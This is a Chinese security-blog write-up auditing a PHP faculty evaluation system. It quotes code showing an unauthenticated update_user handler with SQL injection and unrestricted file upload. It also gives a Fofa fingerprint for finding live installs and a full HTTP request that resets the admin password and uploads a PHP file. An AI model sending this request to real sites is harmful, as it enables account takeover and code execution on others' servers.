原创 Swimt 星悦安全
星悦安全
微信号 XingYue404
功能介绍 网络安全知识分享|渗透测试|代码审计|SRC|专注分享优质内容。
__发表于
收录于合集
#代码审计 7 个
#漏洞复现 2 个
Fofa: "assets/dist/css/jquery.datetimepicker.min.css"
源码下载 : https://www.sourcecodester.com/php/14635/faculty-evaluation- system-using-phpmysqli-source-code.html
这是一套面板系统,看了代码之后只能说一言难尽..... 界面长这样
我们先看这个 ajax.php 里边调用了 update_user 方法
<?php
ob_start();
date_default_timezone_set("Asia/Manila");
$action = $_GET['action']; //Get请求action
include 'admin_class.php'; //引用admin_class.php
$crud = new Action();
//省略其他无用代码......
...
if($action == 'update_user'){
$save = $crud->update_user();
if($save)
echo $save;
...
追到 admin_class.php ,我们来看看 update_user ,看到里边直接更新了管理员的信息,顺带上传了文件,鉴权跟不存在一样...
function update_user(){
extract($_POST);
$data = "";
$type = array("","users","faculty_list","student_list");
foreach($_POST as $k => $v){
if(!in_array($k, array('id','cpass','table','password')) && !is_numeric($k)){
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
if($check > 0){
return 2;
exit;
}
if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
$data .= ", avatar = '$fname' ";
}
if(!empty($password))
$data .= " ,password=md5('$password') ";
if(empty($id)){
$save = $this->db->query("INSERT INTO {$type[$_SESSION['login_type']]} set $data");
}else{
echo "UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id";
$save = $this->db->query("UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id");
}
if($save){
foreach ($_POST as $key => $value) {
if($key != 'password' && !is_numeric($key))
$_SESSION['login_'.$key] = $value;
}
if(isset($_FILES['img']) && !empty($_FILES['img']['tmp_name']))
$_SESSION['login_avatar'] = $fname;
return 1;
}
}
如果成功就会 return 1 中间还有一串检测邮箱的代码,但问题不大:
$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
Payload:
POST /eval/ajax.php?action=update_user HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/eval/index.php?page=report
Content-Length: 737
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------166782539326470--
**没有显示上传路径咋办? 直接登录后台看 **admin@admin.com|admin 因为密码已经被修改了...
文件实际上传在这: /assets/uploads/时间戳_filename.php
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看